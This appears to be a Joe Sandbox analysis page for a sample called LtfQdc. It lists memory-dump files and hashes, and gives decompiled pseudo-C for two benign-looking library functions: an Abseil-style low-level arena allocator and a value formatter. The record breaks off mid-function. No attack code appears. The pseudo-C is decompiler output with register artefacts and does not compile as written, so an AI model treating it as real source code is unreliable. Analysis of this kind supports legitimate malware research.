Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
Instruction ID: 0f0a8513f1b69a308f967d819f175365f21214fb1a4cabf6267e2fd912ba3e8d
Opcode Fuzzy Hash: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
Instruction Fuzzy Hash: D9419434D0CB9A87D7069F39C5411A6F7A0BFAA248F04CB1EED9436562E731B6C49781

Uniqueness

Uniqueness Score: -1.00%

Function 00C818B0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
Instruction ID: 98b76f6df760ecf277ca7d481a25c776e4c47fd3593f13c8a97a772beca0e03a
Opcode Fuzzy Hash: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
Instruction Fuzzy Hash: 44318C3480CB9A97D7029F39C441166F7A0BFAA258F00CB1EEDD433261D771BA84AB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C8614D Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
Instruction ID: 3e4aa2ddb2d8e81c8354a7a9abd9c0855dd406e35942f766b766150b3b172115
Opcode Fuzzy Hash: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
Instruction Fuzzy Hash: DD1151D9C2AF7A06E713633B5D42242DA105EF7989550D347FCB439D61F701B5C17210

Uniqueness

Uniqueness Score: -1.00%

Function 00C8626D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
Instruction ID: 7b954fd7434b16f392998e7452f15770c1e012c64c0d35b07d88df37a7d881fe
Opcode Fuzzy Hash: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
Instruction Fuzzy Hash: CB014FDAC24FAA45E313A33D6843282E6109FF7548620E347FCF838E62F70176D46220

Uniqueness

Uniqueness Score: -1.00%

Function 00D184BC Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63eafb40eb330a33c8bf319f25561a33b45900a71dada50ae572f0e87c37fd7
Instruction ID: fd093594e4065f20031c11cd7090c4e44c69a6211aca8285c3e4354f79ab96e3
Opcode Fuzzy Hash: f63eafb40eb330a33c8bf319f25561a33b45900a71dada50ae572f0e87c37fd7
Instruction Fuzzy Hash: 90F0A031610330ABCB26CB4CD406B8873A9EB45B20F15405AE441EB250CE70DE80C7E8

Uniqueness

Uniqueness Score: -1.00%

Function 00D1848B Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75082cc0214d099a74e8e5e3d19de57714db0a2f9c83b61d2e7da2cc707775a5
Instruction ID: 17461b53631fcf9a56acf31a84cfb9b755fd88ee12d199bd01d8119fdbcfe428
Opcode Fuzzy Hash: 75082cc0214d099a74e8e5e3d19de57714db0a2f9c83b61d2e7da2cc707775a5
Instruction Fuzzy Hash: EAE08C32915228FBCB15DBC8D9449CAF3FCEB49B00B150096F515D3201CA74DE80D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C84577 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
Instruction ID: 31a8975be8b22b7de8a7f2d4d171641a592c136944a955044fbd1ba8a39d1e59
Opcode Fuzzy Hash: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
Instruction Fuzzy Hash: 84E012305183418FC746DF20C190866FBF1EF87311B06E689D4599B566D334EE88CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A7C6 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0666d10a05e89d19fcf63f29b4a68be3e1570c30c133ac300d2f9e1158eff2
Instruction ID: 3a0a7d36bd67a928220c4200e714fe2a0f694aa5efe31578bcd0835f1e52ee11
Opcode Fuzzy Hash: 8d0666d10a05e89d19fcf63f29b4a68be3e1570c30c133ac300d2f9e1158eff2
Instruction Fuzzy Hash: FAC08C38100A044ECE29CD188271BA43365F3D6786F88048CC80A0B682DD1E9C82E632

Uniqueness

Uniqueness Score: -1.00%

Function 00C9584B Relevance: 27.3, APIs: 1, Strings: 17, Instructions: 304
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00C9584B(void* __ecx, signed char* __edx) {
				void* _v16;
				signed int _v24;
				char _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed char _t73;
				signed int _t80;
				signed int _t88;
				signed char _t90;
				char* _t99;
				void* _t102;
				void* _t115;
				signed int _t116;
				signed int* _t123;
				signed char* _t124;
				void* _t131;
				signed int* _t134;
				signed int _t135;
				signed int _t138;
				signed int _t143;
				signed int _t145;
				void* _t146;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				signed int _t154;
				void* _t157;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				long _t163;
				signed int _t164;
				signed int _t165;
				signed int** _t167;
				signed int** _t169;

				_t134 = __edx;
				_t167 = (_t165 & 0xfffffff0) - 0x90;
				_t69 =  *0xd40014; // 0xfbddd969
				_t70 = _t69 ^ _t164;
				_v24 = _t69 ^ _t164;
				if(__ecx == 0) {
					_t157 = 0;
				} else {
					_t146 = __ecx;
					_t73 =  *__edx;
					_v160 = __edx;
					if((_t73 & 0x00000001) != 0) {
						L40:
						E00D240A4(_t134, _t134);
						_t134 = _v160;
					} else {
						asm("lock cmpxchg [edx], ecx");
						if((_t73 & 0x00000001) != 0) {
							goto L40;
						}
					}
					_t158 = _t134[0x27];
					_t115 = _t146 + 0x10;
					if(_t146 >= 0xfffffff0) {
						_push("LowLevelAlloc arithmetic overflow");
						_push("sum >= a");
						L00C93BFF(3, "low_level_alloc.cc", 0x1b6, "Check %s failed: %s");
						_t135 = _v160;
						_t167 =  &(_t167[6]);
					}
					_t148 = _t146 + _t158 + 0xf;
					if(_t148 < _t115) {
						_push("LowLevelAlloc arithmetic overflow");
						_push("sum >= a");
						L00C93BFF(3, "low_level_alloc.cc", 0x1b6, "Check %s failed: %s");
						_t135 = _v160;
						_t167 =  &(_t167[6]);
					}
					_t149 = _t148 &  ~_t158;
					_v152 = _t135 + 4;
					_v156 = _t149;
					_v148 = _t149 - 1;
					while(1) {
						_t80 = L00C95CA9(_v156,  *((intOrPtr*)(_v160 + 0xa0)), 0);
						_t123 = _v160;
						_t167 =  &(_t167[1]);
						if(_t80 <= _t123[5]) {
							goto L13;
						}
						L7:
						_t84 =  *_t123;
						 *_t123 =  *_t123 & 0x00000002;
						if( *_t123 >= 8) {
							E00D24192(_t123, _t84);
							_t138 = _v160;
							_t123 =  *_t167;
						}
						_t152 = _t123[0x26] << 4;
						_t162 = _v148 + _t152;
						if(_t162 < _t138) {
							_push("LowLevelAlloc arithmetic overflow");
							_push("sum >= a");
							L00C93BFF(3, "low_level_alloc.cc", 0x1b6, "Check %s failed: %s");
							_t167 =  &(_t167[6]);
						}
						_t163 = _t162 &  ~_t152;
						_t88 = VirtualAlloc(0, _t163, 0x3000, 4);
						_t154 = _t88;
						if(_t88 == 0) {
							_push("VirtualAlloc failed");
							_push("new_pages != nullptr");
							L00C93BFF(3, "low_level_alloc.cc", 0x22b, "Check %s failed: %s");
							_t167 =  &(_t167[6]);
						}
						_t124 = _v160;
						_t90 =  *_t124;
						if((_t90 & 0x00000001) != 0) {
							L28:
							E00D240A4(_t124, _t138);
							_t124 = _v160;
						} else {
							_t138 = _t90 | 0x00000001;
							asm("lock cmpxchg [ecx], edx");
							if((_t90 & 0x00000001) != 0) {
								goto L28;
							}
						}
						 *_t154 = _t163;
						 *(_t154 + 4) = _t154 ^ 0x4c833e95;
						 *(_t154 + 8) = _t124;
						E00C9572D(_t154 + 0x10, _v160);
						continue;
						L13:
						_t150 = _t80;
						_t161 = _v152;
						while(1) {
							_t116 = _t161;
							if( *((intOrPtr*)(_t161 + 0x10)) < _t150) {
								_push("too few levels in Next()");
								_push("i < prev->levels");
								L00C93BFF(3, "low_level_alloc.cc", 0x1c6, "Check %s failed: %s");
								_t138 = _v156;
								_t123 = _v160;
								_t167 =  &(_t167[6]);
							}
							_t161 =  *(_t116 + 0x10 + _t150 * 4);
							if(_t161 == 0) {
								goto L7;
							}
							if( *(_t161 + 4) != (_t161 ^ 0xb37cc16a)) {
								_push("bad magic number in Next()");
								_push("next->header.magic == Magic(kMagicUnallocated, &next->header)");
								L00C93BFF(3, "low_level_alloc.cc", 0x1cb, "Check %s failed: %s");
								_t123 = _v160;
								_t167 =  &(_t167[6]);
							}
							if( *((intOrPtr*)(_t161 + 8)) != _t123) {
								_push("bad arena pointer in Next()");
								_push("next->header.arena == arena");
								L00C93BFF(3, "low_level_alloc.cc", 0x1cc, "Check %s failed: %s");
								_t138 = _v156;
								_t123 = _v160;
								_t167 =  &(_t167[6]);
							}
							if(_v152 != _t116) {
								if(_t161 <= _t116) {
									_push("unordered freelist");
									_push("prev < next");
									L00C93BFF(3, "low_level_alloc.cc", 0x1ce, "Check %s failed: %s");
									_t138 = _v156;
									_t123 = _v160;
									_t167 =  &(_t167[6]);
								}
								if(_t116 +  *_t116 >= _t161) {
									_push("malformed freelist");
									_push("reinterpret_cast<char *>(prev) + prev->header.size < reinterpret_cast<char *>(next)");
									L00C93BFF(3, "low_level_alloc.cc", 0x1d1, "Check %s failed: %s");
									_t138 = _v156;
									_t123 = _v160;
									_t167 =  &(_t167[6]);
								}
							}
							if( *_t161 < _t138) {
								continue;
							}
							_t99 =  &_v144;
							 *((intOrPtr*)(_t99 + 0x74)) = 0xffffffffffffffff;
							 *((intOrPtr*)(_t99 + 0x70)) = 0xffffffffffffffff;
							asm("pcmpeqd xmm0, xmm0");
							asm("movdqa [eax+0x60], xmm0");
							asm("movdqa [eax+0x50], xmm0");
							asm("movdqa [eax+0x40], xmm0");
							asm("movdqa [eax+0x30], xmm0");
							asm("movdqa [eax+0x20], xmm0");
							asm("movdqa [eax+0x10], xmm0");
							asm("movdqa [eax], xmm0");
							_t114 = _t138;
							L00C95E71(_v152, _t161, _t99);
							_t143 = _v160;
							_t169 =  &(_t167[1]);
							_t145 =  *((intOrPtr*)(_t143 + 0xa0)) + _t138;
							if(_t145 < 0) {
								_push("LowLevelAlloc arithmetic overflow");
								_push("sum >= a");
								L00C93BFF(3, "low_level_alloc.cc", 0x1b6, "Check %s failed: %s");
								_t143 = _v160;
								_t169 =  &(_t169[6]);
							}
							_t102 =  *_t161;
							if(_t145 <= _t102) {
								_t145 = _v156;
								_t131 = _t161 + _t145 + 0x10;
								 *((intOrPtr*)(_t131 - 0x10)) = _t102 - _t145;
								 *(_t131 - 0xc) = _t161 + _t145 ^ 0x4c833e95;
								 *((intOrPtr*)(_t131 - 8)) = _t143;
								 *_t161 = _t145;
								E00C9572D(_t131, _v160);
								_t143 = _v160;
							}
							 *(_t161 + 4) = _t161 ^ 0x4c833e95;
							if( *((intOrPtr*)(_t161 + 8)) != _t143) {
								_push(0xd2fc87);
								_push("s->header.arena == arena");
								L00C93BFF(3, "low_level_alloc.cc", 0x254, "Check %s failed: %s");
								_t134 = _v160;
							}
							_t134[0x24] = _t134[0x24] + 1;
							_t70 =  *_t134;
							 *_t134 =  *_t134 & 0x00000002;
							if( *_t134 >= 8) {
								_t70 = E00D24192(_t134, _t70);
							}
							_t157 = _t161 + 0x10;
							goto L39;
						}
						goto L7;
					}
				}
				L39:
				E00CFE643(_t70, _t114, _v24 ^ _t164, _t134, _t145, _t157);
				return _t157;
			}

0x00c9584b
0x00c95854
0x00c9585a
0x00c9585f
0x00c95861
0x00c9586a
0x00c95bc6
0x00c95870
0x00c95870
0x00c95872
0x00c95876
0x00c95879
0x00c95be0
0x00c95be2
0x00c95be7
0x00c9587f
0x00c95884
0x00c9588a
0x00000000
0x00000000
0x00c9588a
0x00c95890
0x00c95896
0x00c9589c
0x00c95bf9
0x00c95bfe
0x00c95c14
0x00c95c19
0x00c95c1d
0x00c95c1d
0x00c958a4
0x00c958a9
0x00c95c25
0x00c95c2a
0x00c95c40
0x00c95c45
0x00c95c49
0x00c95c49
0x00c958b1
0x00c958b6
0x00c958ba
0x00c958c1
0x00c958c5
0x00c958d6
0x00c958dd
0x00c958e1
0x00c958e7
0x00000000
0x00000000
0x00c958ed
0x00c958f2
0x00c958f2
0x00c958f7
0x00c95ab5
0x00c95aba
0x00c95abe
0x00c95abe
0x00c95903
0x00c9590a
0x00c9590f
0x00c95ac6
0x00c95acb
0x00c95ae1
0x00c95ae6
0x00c95ae6
0x00c95917
0x00c95923
0x00c95929
0x00c9592d
0x00c95aee
0x00c95af3
0x00c95b09
0x00c95b0e
0x00c95b0e
0x00c95933
0x00c95936
0x00c9593a
0x00c95aa7
0x00c95aa7
0x00c95aac
0x00c95940
0x00c95942
0x00c95945
0x00c9594b
0x00000000
0x00000000
0x00c9594b
0x00c95951
0x00c9595a
0x00c9595d
0x00c95968
0x00000000
0x00c95972
0x00c95972
0x00c95974
0x00c95978
0x00c95978
0x00c9597d
0x00c959bd
0x00c959c2
0x00c959d8
0x00c959dd
0x00c959e1
0x00c959e5
0x00c959e5
0x00c9597f
0x00c95985
0x00000000
0x00000000
0x00c95995
0x00c959ea
0x00c959ef
0x00c95a05
0x00c95a0e
0x00c95a12
0x00c95a12
0x00c9599a
0x00c95a17
0x00c95a1c
0x00c95a32
0x00c95a37
0x00c95a3b
0x00c95a3f
0x00c95a3f
0x00c959a0
0x00c959a4
0x00c95a47
0x00c95a4c
0x00c95a62
0x00c95a67
0x00c95a6b
0x00c95a6f
0x00c95a6f
0x00c959ae
0x00c95a77
0x00c95a7c
0x00c95a92
0x00c95a97
0x00c95a9b
0x00c95a9f
0x00c95a9f
0x00c959ae
0x00c959b6
0x00000000
0x00000000
0x00c95b19
0x00c95b1d
0x00c95b20
0x00c95b23
0x00c95b27
0x00c95b2c
0x00c95b31
0x00c95b36
0x00c95b3b
0x00c95b40
0x00c95b45
0x00c95b4d
0x00c95b52
0x00c95b57
0x00c95b5b
0x00c95b64
0x00c95b66
0x00c95c51
0x00c95c56
0x00c95c6c
0x00c95c71
0x00c95c75
0x00c95c75
0x00c95b6c
0x00c95b70
0x00c95b72
0x00c95b7b
0x00c95b7e
0x00c95b89
0x00c95b8c
0x00c95b8f
0x00c95b94
0x00c95b99
0x00c95b99
0x00c95ba3
0x00c95ba9
0x00c95c7d
0x00c95c82
0x00c95c98
0x00c95c9d
0x00c95ca1
0x00c95baf
0x00c95bba
0x00c95bba
0x00c95bbf
0x00c95bf2
0x00c95bf2
0x00c95bc1
0x00000000
0x00c95bc1
0x00000000
0x00c95978
0x00c958c5
0x00c95bc8
0x00c95bd1
0x00c95bdf

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C95923

Part of subcall function 00C93BFF: _strlen.LIBCMT ref: 00C93D33

Strings

prev < next, xrefs: 00C95A4C
Check %s failed: %s, xrefs: 00C959C7, 00C959F4, 00C95A21, 00C95A51, 00C95A81, 00C95AD0, 00C95AF8, 00C95C03, 00C95C2F, 00C95C5B, 00C95C87
next->header.arena == arena, xrefs: 00C95A1C
next->header.magic == Magic(kMagicUnallocated, &next->header), xrefs: 00C959EF
s->header.arena == arena, xrefs: 00C95C82
too few levels in Next(), xrefs: 00C959BD
bad arena pointer in Next(), xrefs: 00C95A17
LowLevelAlloc arithmetic overflow, xrefs: 00C95AC6, 00C95BF9, 00C95C25, 00C95C51
malformed freelist, xrefs: 00C95A77
i < prev->levels, xrefs: 00C959C2
low_level_alloc.cc, xrefs: 00C959D1, 00C959FE, 00C95A2B, 00C95A5B, 00C95A8B, 00C95ADA, 00C95B02, 00C95C0D, 00C95C39, 00C95C65, 00C95C91
VirtualAlloc failed, xrefs: 00C95AEE
new_pages != nullptr, xrefs: 00C95AF3
sum >= a, xrefs: 00C95ACB, 00C95BFE, 00C95C2A, 00C95C56
unordered freelist, xrefs: 00C95A47
reinterpret_cast<char *>(prev) + prev->header.size < reinterpret_cast<char *>(next), xrefs: 00C95A7C
bad magic number in Next(), xrefs: 00C959EA

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AllocVirtual_strlen
String ID: Check %s failed: %s$LowLevelAlloc arithmetic overflow$VirtualAlloc failed$bad arena pointer in Next()$bad magic number in Next()$i < prev->levels$low_level_alloc.cc$malformed freelist$new_pages != nullptr$next->header.arena == arena$next->header.magic == Magic(kMagicUnallocated, &next->header)$prev < next$reinterpret_cast<char *>(prev) + prev->header.size < reinterpret_cast<char *>(next)$s->header.arena == arena$sum >= a$too few levels in Next()$unordered freelist
API String ID: 3554592677-938779485
Opcode ID: 6a872c676bcbe5ca31bf7bd9b9ce28eb55873c7e9dc52f4830b3c0fc5153ddab
Instruction ID: 41bab77ced8b13ee184666410552207343660fbf67763a134d980ccf3d957201
Opcode Fuzzy Hash: 6a872c676bcbe5ca31bf7bd9b9ce28eb55873c7e9dc52f4830b3c0fc5153ddab
Instruction Fuzzy Hash: BDB10731B447119FEF11EF18CC97E1AB7A1ABD4B04F104A2DF6856B281DBB0DA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEB9B0 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CEB9B0(void* __fp0, signed char _a4, signed char _a8, intOrPtr _a12) {
				void* _v16;
				signed int _v24;
				char _v32;
				signed int _v37;
				intOrPtr _v40;
				char* _v44;
				char _v47;
				char* _v48;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int _t34;
				signed int _t38;
				signed int _t43;
				void* _t45;
				intOrPtr _t47;
				signed int _t48;

				_t43 =  *0xd40014; // 0xfbddd969
				_t44 = _t43 ^ _t48;
				_v24 = _t43 ^ _t48;
				_t34 = (_a4 & 0x000000ff) - 1;
				if(_t34 > 8) {
					L36:
					return E00CFE643(_t34, _t38, _v24 ^ _t48, _t44, _t45, _t47);
				}
				_t47 = _a12;
				_t38 = _a8 & 0x000000ff;
				switch( *((intOrPtr*)(_t34 * 4 +  &M00D36F28))) {
					case 0:
						__eflags =  *__ecx;
						__eax = "false";
						__edx = "true";
						__edx =  ==  ? "false" : "true";
						__ecx = __esi;
						_push(__edx);
						__eax = E00CB513A(__ebx, __ecx, __fp0);
						goto L36;
					case 1:
						_push( *((intOrPtr*)(__ecx + 4)));
						_push( *__ecx);
						_push("%llu");
						goto L11;
					case 2:
						_push( *((intOrPtr*)(__ecx + 4)));
						_push( *__ecx);
						_push("%lld");
						goto L11;
					case 3:
						asm("movsd xmm0, [ecx]");
						_v44 = 0;
						_v48 = 0;
						_v40 = 0;
						asm("movsd [esp], xmm0");
						asm("movsd [esp+0x18], xmm0");
						_t12 =  &_v32; // 0x4c
						__edi = _t12;
						__eax = L00D0CE27(__edi);
						__eflags = __ax;
						if(__ax <= 0) {
							__esp = __esp - 0xc;
							asm("movsd xmm0, [esp+0xc]");
							asm("movsd [esp+0x4], xmm0");
							_t14 =  &_v48; // 0x48
							__edi = _t14;
							__eax = E00CCA730(__edi);
							__esp = __esp + 0xc;
							__ecx = __edi;
							__eax = L00CB4D78(__edi, 0x2e, 0);
							__eflags = __eax - 0xffffffff;
							if(__eax == 0xffffffff) {
								_t15 =  &_v48; // 0x40
								__ecx = _t15;
								__eax = L00CB4D78(_t15, 0x65, 0);
								__eflags = __eax - 0xffffffff;
								if(__eax == 0xffffffff) {
									_t16 =  &_v48; // 0x38
									__ecx = _t16;
									__eax = L00CB4D78(_t16, 0x45, 0);
									__eflags = __eax - 0xffffffff;
									if(__eax == 0xffffffff) {
										_t17 =  &_v48; // 0x30
										__ecx = _t17;
										_push(".0");
										__eax = E00CB513A(__ebx, _t17, __fp0);
									}
								}
							}
							__eax = _v37 & 0x000000ff;
							__eflags = __al;
							if(__al < 0) {
								__eax = _v48;
								__ecx =  *__eax & 0x000000ff;
								__eflags = __cl - 0x2e;
								if(__cl != 0x2e) {
									__eflags = _v44 - 2;
									if(_v44 < 2) {
										goto L31;
									}
									__eflags = __cl - 0x2d;
									if(__cl != 0x2d) {
										goto L31;
									}
									__eax =  &(__eax[1]);
									__eflags = __eax;
									goto L40;
								}
								goto L29;
							} else {
								__ecx = _v48 & 0x000000ff;
								__eflags = __cl - 0x2e;
								if(__cl == 0x2e) {
									L29:
									_t23 =  &_v48; // 0x40
									__ecx = _t23;
									_push(0xd2fbcd);
									_push(0);
									L30:
									__eax = L00CB4DCC(__ecx, __edx, __fp0);
									L31:
									__eflags = _v37;
									if(__eflags >= 0) {
										_t26 =  &_v48; // 0x40
										__eax = _t26;
									} else {
										__eax = _v48;
									}
